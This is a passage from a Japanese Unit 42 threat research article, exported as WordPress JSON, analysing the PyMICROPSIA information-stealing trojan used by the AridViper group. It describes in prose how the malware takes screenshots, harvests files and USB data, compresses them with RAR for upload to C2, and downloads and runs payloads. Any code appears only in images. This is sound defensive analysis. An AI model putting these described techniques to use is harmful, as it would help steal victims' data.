href=\"https:\/\/pypi.org\/project\/mss\/\">mss<\/a>\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u3001C2\u306b\u5b9a\u671f\u7684\u306b\u9001\u4fe1\u3059\u308b\u3053\u3068\u3082\u3001C2\u30aa\u30da\u30ec\u30fc\u30bf\u304c\u9069\u5207\u306a\u30b3\u30de\u30f3\u30c9\u3092\u9001\u4fe1\u3057\u305f\u5834\u5408\u306f\u30aa\u30f3\u30c7\u30de\u30f3\u30c9\u3067\u9001\u4fe1\u3059\u308b\u3053\u3068\u3082\u3067\u304d\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110208\" aria-describedby=\"caption-attachment-110208\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110209 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-207.png\" alt=\"\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u306f\u3001Python\u306emss\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u3001C2\u306b\u5b9a\u671f\u7684\u306b\u9001\u4fe1\u3059\u308b\u3053\u3068\u3082\u3001C2\u30aa\u30da\u30ec\u30fc\u30bf\u304c\u9069\u5207\u306a\u30b3\u30de\u30f3\u30c9\u3092\u9001\u4fe1\u3057\u305f\u5834\u5408\u306f\u30aa\u30f3\u30c7\u30de\u30f3\u30c9\u3067\u9001\u4fe1\u3059\u308b\u3053\u3068\u3082\u3067\u304d\u307e\u3059\u3002\" width=\"900\" height=\"505\" \/><figcaption id=\"caption-attachment-110208\" class=\"wp-caption-text\">\u56f326.\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u6a5f\u80fd<\/figcaption><\/figure>\n<h6><strong>\u30d5\u30a1\u30a4\u30eb\u53ce\u96c6\u60c5\u5831<\/strong><\/h6>\n<p>\u30b3\u30fc\u30c9\u5168\u4f53\u306b\u308f\u305f\u3063\u3066\u3001\u60c5\u5831\u53ce\u96c6\u6307\u5411\u306e\u8907\u6570\u306e\u30e1\u30bd\u30c3\u30c9\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u306e\u30e1\u30bd\u30c3\u30c9\u306f\u3001C2\u30aa\u30da\u30ec\u30fc\u30bf\u3068\u306e\u3055\u307e\u3056\u307e\u306a\u3084\u308a\u53d6\u308a\u306b\u5fdc\u3058\u3066\u547c\u3073\u51fa\u3055\u308c\u3001\u30aa\u30da\u30ec\u30fc\u30bf\u306f\u53ce\u96c6\u3057\u305f\u3044\u60c5\u5831\u306e\u7a2e\u985e\u3092\u9078\u629e\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>\u305f\u3068\u3048\u3070\u3001\u4ee5\u4e0b\u306e\u8907\u6570\u306e\u56f3\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u7279\u5b9a\u306e\u30d5\u30a9\u30eb\u30c0\u3092\u53ce\u96c6\u3059\u308b\u6c4e\u7528\u30e1\u30bd\u30c3\u30c9\u3068\u3055\u307e\u3056\u307e\u306a\u30ec\u30d9\u30eb\u3067\u8a73\u7d30\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u6c4e\u7528\u30e1\u30bd\u30c3\u30c9\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110210\" aria-describedby=\"caption-attachment-110210\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110211 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-208.png\" alt=\"\u30b3\u30fc\u30c9\u5168\u4f53\u306b\u308f\u305f\u3063\u3066\u3001\u60c5\u5831\u53ce\u96c6\u6307\u5411\u306e\u8907\u6570\u306e\u30e1\u30bd\u30c3\u30c9\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u306b\u306f\u3001C:\\users\u304a\u3088\u3073C:\\Documents and settings\u306e\u4e0b\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u53ce\u96c6\u304c\u542b\u307e\u308c\u307e\u3059\u3002 \" width=\"900\" height=\"936\" \/><figcaption id=\"caption-attachment-110210\" class=\"wp-caption-text\">\u56f327.C:\\users\u3068C:\\Documents and Settings\u306e\u4e0b\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u53ce\u96c6<\/figcaption><\/figure>\n<figure id=\"attachment_110212\" aria-describedby=\"caption-attachment-110212\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110213 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-209.png\" alt=\"\u30b3\u30fc\u30c9\u5168\u4f53\u306b\u308f\u305f\u3063\u3066\u3001\u60c5\u5831\u53ce\u96c6\u6307\u5411\u306e\u8907\u6570\u306e\u30e1\u30bd\u30c3\u30c9\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u306b\u306f\u3001JSON\u5f62\u5f0f\u3067\u306e\u76ee\u7684\u306e\u8907\u6570\u306e\u30d5\u30a9\u30eb\u30c0\u4e0b\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u53ce\u96c6\u304c\u542b\u307e\u308c\u307e\u3059\u3002 \" width=\"900\" height=\"1347\" \/><figcaption id=\"caption-attachment-110212\" class=\"wp-caption-text\">\u56f328.JSON\u5f62\u5f0f\u3067\u306e\u76ee\u7684\u306e\u8907\u6570\u306e\u30d5\u30a9\u30eb\u30c0\u4e0b\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u53ce\u96c6\u306e\u8a73\u7d30<\/figcaption><\/figure>\n<p>\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u5916\u90e8\u30c9\u30e9\u30a4\u30d6\u304b\u3089\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110214\" aria-describedby=\"caption-attachment-110214\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110215 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-210.png\" alt=\"\u30b3\u30fc\u30c9\u5168\u4f53\u306b\u308f\u305f\u3063\u3066\u3001\u60c5\u5831\u53ce\u96c6\u6307\u5411\u306e\u8907\u6570\u306e\u30e1\u30bd\u30c3\u30c9\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u306b\u306f\u3001\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u5916\u90e8\u30c9\u30e9\u30a4\u30d6\u304b\u3089\u306e\u60c5\u5831\u53ce\u96c6\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"582\" \/><figcaption id=\"caption-attachment-110214\" class=\"wp-caption-text\">\u56f329.USB\u60c5\u5831\u53ce\u96c6\u306e\u4f8b<\/figcaption><\/figure>\n<p>\u7279\u5b9a\u306e\u30d5\u30a1\u30a4\u30eb\u62e1\u5f35\u5b50\u306b\u7684\u3092\u7d5e\u3063\u305f\u30e1\u30bd\u30c3\u30c9\u306a\u3069\u3001\u4ed6\u306e\u624b\u6cd5\u3082\u3042\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110216\" aria-describedby=\"caption-attachment-110216\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110217 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-211.png\" alt=\"\u30b3\u30fc\u30c9\u5168\u4f53\u306b\u308f\u305f\u3063\u3066\u3001\u60c5\u5831\u53ce\u96c6\u6307\u5411\u306e\u8907\u6570\u306e\u30e1\u30bd\u30c3\u30c9\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u306b\u306f\u3001\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u7279\u5b9a\u306e\u62e1\u5f35\u5b50\u30bf\u30a4\u30d7\u5225\u306e\u30d5\u30a1\u30a4\u30eb\u60c5\u5831\u306e\u53ce\u96c6\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\" width=\"900\" height=\"892\" \/><figcaption id=\"caption-attachment-110216\" class=\"wp-caption-text\">\u56f330.\u7279\u5b9a\u306e\u62e1\u5f35\u5b50\u30bf\u30a4\u30d7\u5225\u306b\u30d5\u30a1\u30a4\u30eb\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u4f8b<\/figcaption><\/figure>\n<h6><strong>\u30d5\u30a1\u30a4\u30eb\u306e\u53d6\u5f97<\/strong><\/h6>\n<p>\u30d5\u30a1\u30a4\u30eb\u30aa\u30da\u30ec\u30fc\u30bf\u306f\u3001\u30c7\u30a3\u30b9\u30af\u304b\u3089\u3055\u307e\u3056\u307e\u306a\u30bf\u30a4\u30d7\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u53ce\u96c6\u3067\u304d\u308b\u591a\u6570\u306e\u30b3\u30de\u30f3\u30c9\u3092\u6301\u3063\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u53ce\u96c6\u30e1\u30bd\u30c3\u30c9\u306f\u3001\u901a\u5e38\u306f\u3001\u30bf\u30fc\u30b2\u30c3\u30c8\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3001C2\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30c7\u30fc\u30bf\u3092\u6b63\u5f53\u306aRAR\u30e6\u30fc\u30c6\u30a3\u30ea\u30c6\u30a3\u3067\u5727\u7e2e\u3059\u308b\u3053\u3068\u3067\u5b8c\u9042\u3055\u308c\u307e\u3059\u3002\u4ee5\u4e0b\u306e\u4f8b\u306f\u3001\u30b3\u30de\u30f3\u30c9\u3067\u7279\u5b9a\u306e\u62e1\u5f35\u5b50\u306b\u7684\u3092\u7d5e\u308b\u65b9\u6cd5\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110218\" aria-describedby=\"caption-attachment-110218\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110219 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-212.png\" alt=\"\u3053\u306e\u4f8b\u306f\u3001C2\u30b3\u30de\u30f3\u30c9\u3067\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3001\u5727\u7e2e\u3001\u304a\u3088\u3073\u53ce\u96c6\u3059\u308b\u969b\u306b\u7279\u5b9a\u306e\u62e1\u5f35\u5b50\u306b\u7684\u3092\u7d5e\u308b\u65b9\u6cd5\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"705\" \/><figcaption id=\"caption-attachment-110218\" class=\"wp-caption-text\">\u56f331.\u62e1\u5f35\u5b50\u30bf\u30a4\u30d7\u5225\u306b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3001\u5727\u7e2e\u304a\u3088\u3073\u53ce\u96c6\u3059\u308b\u4f8b<\/figcaption><\/figure>\n<h6><strong>\u30b3\u30de\u30f3\u30c9\u306e\u5b9f\u884c<\/strong><\/h6>\n<p>AridViper\u306e\u30aa\u30da\u30ec\u30fc\u30bf\u306f\u3001C2\u3068\u306e\u3084\u308a\u53d6\u308a\u3067\u30b3\u30de\u30f3\u30c9\u3068\u4e00\u7a2e\u306b\u30d1\u30e9\u30e1\u30fc\u30bf\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306f\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u306f\u7279\u5b9a\u306e\u533a\u5207\u308a\u6587\u5b57\u2018;\u2019\u3067\u533a\u5207\u3089\u308c\u3001base64\u3067\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3066\u4f1d\u9001\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u306f\u3055\u307e\u3056\u307e\u306a\u30aa\u30d7\u30b7\u30e7\u30f3\u304c\u5b9f\u88c5\u3055\u308c\u3066\u304a\u308a\u3001\u30aa\u30da\u30ec\u30fc\u30bf\u306f\u3001\u7279\u5b9a\u306eURL\u304b\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c\u3001\u30d7\u30ed\u30bb\u30b9\u306e\u5b9f\u884c\u306a\u3069\u30b3\u30de\u30f3\u30c9\u3092\u67d4\u8edf\u306b\u5b9f\u884c\u3067\u304d\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110220\" aria-describedby=\"caption-attachment-110220\" style=\"width: 820px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110221 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-213.png\" alt=\"\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u306f\u3055\u307e\u3056\u307e\u306a\u30aa\u30d7\u30b7\u30e7\u30f3\u304c\u5b9f\u88c5\u3055\u308c\u3066\u304a\u308a\u3001\u30aa\u30da\u30ec\u30fc\u30bf\u306f\u3001\u7279\u5b9a\u306eURL\u304b\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c\u3001\u30d7\u30ed\u30bb\u30b9\u306e\u5b9f\u884c\u306a\u3069\u30b3\u30de\u30f3\u30c9\u3092\u67d4\u8edf\u306b\u5b9f\u884c\u3067\u304d\u307e\u3059\u3002\" width=\"820\" height=\"444\" \/><figcaption id=\"caption-attachment-110220\" class=\"wp-caption-text\">\u56f332.URL\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u304a\u3088\u3073\u30d7\u30ed\u30bb\u30b9\u5b9f\u884c\u306e\u4f8b<\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 \u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u30ea\u30b5\u30fc\u30c1\u30c1\u30fc\u30e0Unit 42\u306f\u3001\u4e2d\u6771\u5730\u57df\u3092\u6a19\u7684\u3068\u3059\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7AridViper\u3092\u8ffd\u8de1\u3057\u3066\u304d\u307e\u3057\u305f\u3002\u3053\u306e\u30ea\u30b5\u30fc\u30c1\u4e2d\u3001MICROPSIA\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u3068\u95a2\u9023\u3057\u3066\u3044\u308b\u65b0<\/p>\n","protected":false},"author":23,"featured_media":134328,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4321,1974,4428],"tags":[6183,5239,6184,4783],"product_categories":[4441,4443,4444,4343,4448,4456],"coauthors":[1025],"class_list":["post-110283","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research","category-malware-ja","category-threat-research-ja","tag-aridviper-ja","tag-information-stealer-ja","tag-micropsia","tag-trojan-ja","product_categories-advanced-dns-security-ja","product_categories-advanced-url-filtering-ja","product_categories-advanced-wildfire-ja","product_categories-cortex-xdr","product_categories-cortex-xdr-ja","product_categories-next-generation-firewall-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>PyMICROPSIA: AridViper\u304b\u3089\u306e\u65b0\u3057\u3044\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac<\/title>\n<meta name=\"description\" content=\"Unit 42\u306f\u3001\u4e2d\u6771\u5730\u57df\u3092\u6a19\u7684\u3068\u3059\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7AridViper\u3092\u8ffd\u8de1\u8abf\u67fb\u3059\u308b\u306a\u304b\u3067\u3001 MICROPSIA \u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u95a2\u9023\u3059\u308b\u65b0\u305f\u306a\u60c5\u5831\u7a83\u53d6\u578b\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u7279\u5b9a\u3057\u307e\u3057\u305f\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PyMICROPSIA: AridViper\u304b\u3089\u306e\u65b0\u3057\u3044\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac\" \/>\n<meta property=\"og:description\" content=\"Unit 42\u306f\u3001\u4e2d\u6771\u5730\u57df\u3092\u6a19\u7684\u3068\u3059\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7AridViper\u3092\u8ffd\u8de1\u8abf\u67fb\u3059\u308b\u306a\u304b\u3067\u3001 MICROPSIA \u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u95a2\u9023\u3059\u308b\u65b0\u305f\u306a\u60c5\u5831\u7a83\u53d6\u578b\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u7279\u5b9a\u3057\u307e\u3057\u305f\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-17T01:07:47+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-17T02:07:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/04_Malware_Category_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Unit 42\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"PyMICROPSIA: AridViper\u304b\u3089\u306e\u65b0\u3057\u3044\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac","description":"Unit 42\u306f\u3001\u4e2d\u6771\u5730\u57df\u3092\u6a19\u7684\u3068\u3059\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7AridViper\u3092\u8ffd\u8de1\u8abf\u67fb\u3059\u308b\u306a\u304b\u3067\u3001 MICROPSIA \u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u95a2\u9023\u3059\u308b\u65b0\u305f\u306a\u60c5\u5831\u7a83\u53d6\u578b\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u7279\u5b9a\u3057\u307e\u3057\u305f\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/","og_locale":"ja_JP","og_type":"article","og_title":"PyMICROPSIA: AridViper\u304b\u3089\u306e\u65b0\u3057\u3044\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac","og_description":"Unit 42\u306f\u3001\u4e2d\u6771\u5730\u57df\u3092\u6a19\u7684\u3068\u3059\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7AridViper\u3092\u8ffd\u8de1\u8abf\u67fb\u3059\u308b\u306a\u304b\u3067\u3001 MICROPSIA \u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u95a2\u9023\u3059\u308b\u65b0\u305f\u306a\u60c5\u5831\u7a83\u53d6\u578b\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u7279\u5b9a\u3057\u307e\u3057\u305f\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/","og_site_name":"Unit 42","article_published_time":"2020-12-17T01:07:47+00:00","article_modified_time":"2020-12-17T02:07:37+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/04_Malware_Category_1920x900.jpg","type":"image\/jpeg"}],"author":"Unit 42","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/"},"author":{"name":"Unit 42","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"headline":"PyMICROPSIA: AridViper\u304b\u3089\u306e\u65b0\u3057\u3044\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac","datePublished":"2020-12-17T01:07:47+00:00","dateModified":"2020-12-17T02:07:37+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/"},"wordCount":1148,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/04_Malware_Category_1920x900.jpg","keywords":["AridViper","information stealer","MICROPSIA","Trojan"],"articleSection":["Threat Research","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/","name":"PyMICROPSIA: AridViper\u304b\u3089\u306e\u65b0\u3057\u3044\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/04_Malware_Category_1920x900.jpg","datePublished":"2020-12-17T01:07:47+00:00","dateModified":"2020-12-17T02:07:37+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"description":"Unit 42\u306f\u3001\u4e2d\u6771\u5730\u57df\u3092\u6a19\u7684\u3068\u3059\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7AridViper\u3092\u8ffd\u8de1\u8abf\u67fb\u3059\u308b\u306a\u304b\u3067\u3001 MICROPSIA \u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u95a2\u9023\u3059\u308b\u65b0\u305f\u306a\u60c5\u5831\u7a83\u53d6\u578b\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u7279\u5b9a\u3057\u307e\u3057\u305f\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/04_Malware_Category_1920x900.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/04_Malware_Category_1920x900.jpg","width":1920,"height":900,"caption":"The image depicts a close-up view of a circuit board featuring microchips and electronic components with bright red digital data streams emanating from the surface, symbolizing high-speed data processing and technology innovation."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/pymicropsia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"PyMICROPSIA: AridViper\u304b\u3089\u306e\u65b0\u3057\u3044\u60c5\u5831\u7a83\u53d6\u30c8\u30ed\u30a4\u306e\u6728\u99ac"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63","name":"Unit 42","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Unit 42"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/unit42\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/110283","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/23"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=110283"}],"version-history":[{"count":4,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/110283\/revisions"}],"predecessor-version":[{"id":110320,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/110283\/revisions\/110320"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/134328"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=110283"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=110283"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=110283"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=110283"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=110283"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}